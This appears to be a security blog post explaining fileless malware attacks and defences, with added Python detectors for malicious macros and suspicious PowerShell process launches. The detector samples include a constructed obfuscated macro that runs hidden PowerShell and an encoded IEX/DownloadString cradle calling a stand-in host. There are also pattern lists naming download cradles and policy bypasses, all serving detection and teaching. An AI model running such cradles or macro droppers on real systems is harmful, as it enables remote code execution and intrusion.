FILELESS MALWARE ATTACKS
Unlike attacks carried out with traditional malware, fileless malware attacks do not require the attacker to install software on the victim's machine. With no file on disk there is no file hash or signature for antivirus software to match, which greatly reduces the effectiveness of signature-based products against these attacks. Industry surveys (see the Ponemon figure below) report that fileless attacks are almost 10 times more likely to succeed in infecting a machine than file-based attacks.
PS: Educational purposes 🙏
How Fileless Malware works
Purely memory-resident fileless malware is non-persistent: all traces of it disappear when the system is rebooted, which makes forensic investigation difficult. In practice, many campaigns still add persistence through registry run keys, scheduled tasks or WMI event subscriptions that re-launch the in-memory loader after a reboot, so those locations are worth checking even when nothing malicious is found on disk.
The notion of fileless malware has been gaining a lot of attention in the industry.
The majority of successful attacks are now fileless. Source: The Ponemon Institute
Unlike file-based attacks, fileless malware attacks do not download malicious files or write content to disk. Attackers exploit application vulnerabilities to inject code directly into the memory space of an existing process. They can also abuse trusted Office applications or administration tools built into Windows, such as PowerShell or Windows Management Instrumentation (WMI), to run scripts and load malicious code directly into memory. As with any attack, the goal is to gain control of the computer to achieve the attacker's objective, whether that is destruction, encrypting data for ransom (ransomware), data or credential theft, or staging further attacks.
In the example illustrated above, a phishing email containing a link takes the user to an exploit-hosting site. The browser exploit launches PowerShell with a command line (a short script), and PowerShell then follows that script's instructions to download an additional, typically much larger, script from a remote site. The larger script contains the fileless malware, which is assembled and run directly in memory.
In a second example, a user receives a phishing email with a .doc attachment containing a macro. If the user enables the macro, which is essentially a VBA script, it launches a PowerShell script that downloads further scripts containing the fileless payload from a remote location, then injects that code into the memory space of a vulnerable application.
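As an added example (not code from the original post), here is a small static triage script in Python for the macro scenario just described. The VBA it scans is constructed for this illustration, including its split-string obfuscation and the placeholder Base64 blob after -Enc; the auto-execute procedure names and call patterns it looks for are the standard ones Office honours and attackers lean on.

```python
"""Static triage of a VBA macro: flag auto-execute entry points and
suspicious calls, after undoing simple string-splitting obfuscation.
Added example; the macro text below is constructed, not a real sample."""
import re

# Procedures Office runs automatically once macros are enabled.
AUTO_EXEC = {"autoopen", "document_open", "autoexec", "auto_open",
             "workbook_open", "autoclose", "document_close"}

# (label, regex, meaning) for calls that hand off to a shell or fetch code.
SUSPICIOUS = [
    ("Shell()", r"(?<![\w.])Shell\s*\(", "launches an external process"),
    ("WScript.Shell", r"WScript\.Shell", "script host used to run commands"),
    ("CreateObject", r"\bCreateObject\b", "late-bound COM object creation"),
    (".Run/.Exec", r"\.(?:Run|Exec)\b", "runs a command line"),
    ("powershell", r"\bpowershell\b", "PowerShell invocation"),
    ("DownloadString/DownloadFile", r"\bDownload(?:String|File|Data)\b",
     "downloads script text or a payload"),
    ("XMLHTTP", r"XMLHTTP", "HTTP client object"),
    ("-Enc", r"(?<!\w)-e(?:nc|ncodedcommand|c)\b", "Base64-encoded PowerShell command"),
]

def deobfuscate(vba: str) -> str:
    """Collapse Chr(n) calls and `"po" & "wer"` concatenations into plain literals."""
    vba = re.sub(r"Chr\((\d+)\)", lambda m: '"%s"' % chr(int(m.group(1))), vba)
    joined = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
    while True:  # repeat until no adjacent literal pair is left
        new = joined.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), vba)
        if new == vba:
            return vba
        vba = new

def find_auto_exec(vba: str) -> list:
    """Names of declared procedures that Office will run without a click."""
    procs = re.findall(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)",
                       vba, re.I | re.M)
    return [p for p in procs if p.lower() in AUTO_EXEC]

def find_suspicious(vba: str) -> list:
    return [label for label, pat, _ in SUSPICIOUS if re.search(pat, vba, re.I)]

def triage(vba: str) -> dict:
    clean = deobfuscate(vba)
    auto = find_auto_exec(clean)
    hits = find_suspicious(clean)
    # Auto-exec plus a process launch is the classic macro-dropper shape.
    launches = any(h in ("Shell()", "WScript.Shell", ".Run/.Exec") for h in hits)
    if auto and launches:
        verdict = "malicious-looking"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "benign-looking"
    return {"auto_exec": auto, "indicators": hits, "verdict": verdict}

# Constructed macro: splits "powershell" and "WScript.Shell" to dodge naive
# keyword matching; the -Enc blob is a placeholder, not a real payload.
SAMPLE_MACRO = '''
Sub AutoOpen()
    Dim c As String
    c = "pow" & "ersh" & Chr(101) & "ll -NoP -W Hidden -Exec Bypass -Enc SQBFAFgA"
    CreateObject("WSc" & "ript.Sh" & "ell").Run c, 0
End Sub
'''

# Constructed benign macro for contrast: no auto-exec name, no shell hand-off.
BENIGN_MACRO = '''
Sub FormatReport()
    ActiveSheet.Range("A1").Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    print(triage(SAMPLE_MACRO))
    print(triage(BENIGN_MACRO))
```

The deobfuscation step is the part that matters: a keyword scan over the raw source sees neither "powershell" nor "WScript.Shell", which is exactly why real droppers split their strings. Tools such as olevba go much further than this, but the shape of the check is the same.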
Must read: how a hacker broke into a financial domain: https://d3pakblog.wordpress.com/2017/03/09/hacker-hacked-into-financial-domain/
69% of organizations don’t believe their antivirus can stop the threats they’re seeing.
Cyber Kill Chain: the seven steps of the Cyber Kill Chain give visibility into each stage of an attack and enrich an analyst's understanding of an adversary's tactics, techniques, and procedures (TTPs).
Can Fileless Malware Be Stopped?
The risk of an intrusion, fileless or otherwise, including ransomware, and the business impact of an infection can both be reduced by several conventional best practices. These fall into two categories, general good practice and security best practice, and these baseline protections are strongly recommended for any organization.
The problem is complex. To begin with, organizations have to realize that script interpreters such as Microsoft PowerShell are just as capable of delivering malware as the applications that open documents, such as a PDF reader. Secondly, companies must make sure employees understand the danger of opening any attachment they were not expecting, even one that appears to come from a known sender, since sender addresses are easily spoofed. Third, patches from every vendor must be installed promptly; this includes the antivirus software on the system as well as the operating system itself. Simple steps like these can prevent a lot of future pain. According to McAfee, fileless threats continued to be a growing concern in Q3, with PowerShell malware growing by 119%.
For emerging threats such as ransomware, the top-level best practices are the same: education and awareness, data backups, and patching and updates.
Fileless malware already presents a significant problem, and it is gaining popularity among attackers because it is virtually undetectable by traditional file-based prevention and detection techniques. Many endpoint security tools, including so-called next-gen AV, focus on static analysis of files and give little scrutiny to scripts or command lines such as PowerShell invocations, and in a fileless attack no file is written to disk. Because nothing is downloaded and saved to disk, fileless attacks can evade these tools without triggering alarms.
Blocking File-Less Attacks
- Machine learning and algorithms: flag suspicious network traffic and file or script downloads that do not fit the baseline
- Process inspection: review and enforce policies on specific process arguments and parent/child relationships (PowerShell, mshta, wscript, cscript, rundll32, AutoIt, regedit, Office macros, a browser spawning PowerShell, or any process injecting code into another process's memory space)
- Retrospective detection: collect as many IoCs/IoAs (indicators of compromise/attack) as possible for the threat campaign and sweep historical telemetry for them
- Studying the adversaries: Use intelligence baseline and seek out known tactics, techniques and procedures (TTPs) used by multiple adversarial groups
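To make the process-inspection item above concrete, and to tie it back to the phishing-to-PowerShell chains described earlier, here is an added Python example (not part of the original post) that runs those checks over constructed process-creation events shaped like Sysmon Event ID 1 records: parent image, image and command line. The events, the field names and the host stage.example.invalid are constructed for this example; the handling of -EncodedCommand as UTF-16LE Base64 is how PowerShell itself interprets that flag.

```python
"""Inspect process-creation events for fileless-attack shapes: a document
or browser spawning a script host, and PowerShell command lines carrying an
encoded or in-memory download cradle. Added example; events are constructed."""
import base64
import re

OFFICE_AND_BROWSERS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                       "chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "cmd.exe"}

# Command-line fragments typical of in-memory loaders (matched case-insensitively).
CRADLE_PATTERNS = [
    ("download-cradle", r"DownloadString|DownloadData|Net\.WebClient|Invoke-WebRequest|\biwr\b"),
    ("invoke-expression", r"Invoke-Expression|\bIEX\b"),
    ("hidden-window", r"-w(?:indowstyle)?\s+hidden"),
    ("bypass-policy", r"-e(?:xecutionpolicy|p)\s+bypass|-nop\b|-noprofile"),
    ("reflective-load", r"FromBase64String|\[Reflection\.Assembly\]::Load|VirtualAlloc"),
]

# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (UTF-16LE Base64), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed blob: still worth a look, but not decodable here

def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def inspect_event(event: dict) -> dict:
    parent, child = basename(event["parent_image"]), basename(event["image"])
    cmd = event["command_line"]
    findings = []
    if parent in OFFICE_AND_BROWSERS and child in SCRIPT_HOSTS:
        findings.append(f"suspicious-parent:{parent}->{child}")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded-command")
    # Scan the raw line and, when present, the decoded script text together.
    text = cmd + "\n" + (decoded or "")
    for name, pat in CRADLE_PATTERNS:
        if re.search(pat, text, re.I):
            findings.append(name)
    score = len(findings)
    severity = "high" if score >= 3 else "medium" if score else "none"
    return {"image": child, "decoded": decoded, "findings": findings, "severity": severity}

def _enc(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (Base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16le")).decode()

# Constructed events, not real telemetry; the .invalid domain never resolves.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -Enc "
                     + _enc("IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/a.ps1')")},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(inspect_event(ev))
```

The first event scores high on three independent signals (a document spawning PowerShell, an encoded command, and a download cradle plus hidden-window and no-profile switches inside it), while the second, an administrator running a script file from Explorer, produces nothing. Decoding the blob before pattern matching is the step most "command-line" rules skip, and it is the one that turns a single -Enc flag into a readable IEX/DownloadString cradle.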
Read case study: the hacker who hacked Hacking Team
The SANS Security Maturity Model
The SANS Institute has developed a Maturity Model for Endpoint Security that clearly lays out a progression of defensive capabilities relating to end-user devices, which continue to be the source of approximately 70% of successful malware breaches.
Some tips to avoid fileless malware infections, from TechRepublic:
- Restrict unnecessary scripting languages
- Disable macros and digitally sign trusted macros
- Monitor security appliance logs for unauthorized traffic
- Implement endpoint security with active monitoring
- Perform patch management across all devices
Applying the measures above reduces the chance of falling into the trap.
- Fileless Malware Tips
- Hiding Metasploit Shellcode to Evade Windows Defender
- Decoding Fileless Malware
- Fileless malware- the ninja technique to spread malware using default OS tools
- Fileless Malware: Attack Trend Exposed
- FILELESS MALWARE 101: UNDERSTANDING NON-MALWARE ATTACKS
- Fileless Malware: A Hidden Threat
- Detecting Malicious PowerShell Commands using Deep Neural Networks
- Extract Shellcode from Fileless Malware like a Pro
- Must read: AGE OF THE CYBER HUNTER: HOW A NEW GENERATION OF THREATS CHANGED THE CYBERSECURITY PARADIGM
- Malware Analysis
- A curated list of awesome malware analysis tools and resources
Cryptominers have impacted 55% of organizations globally.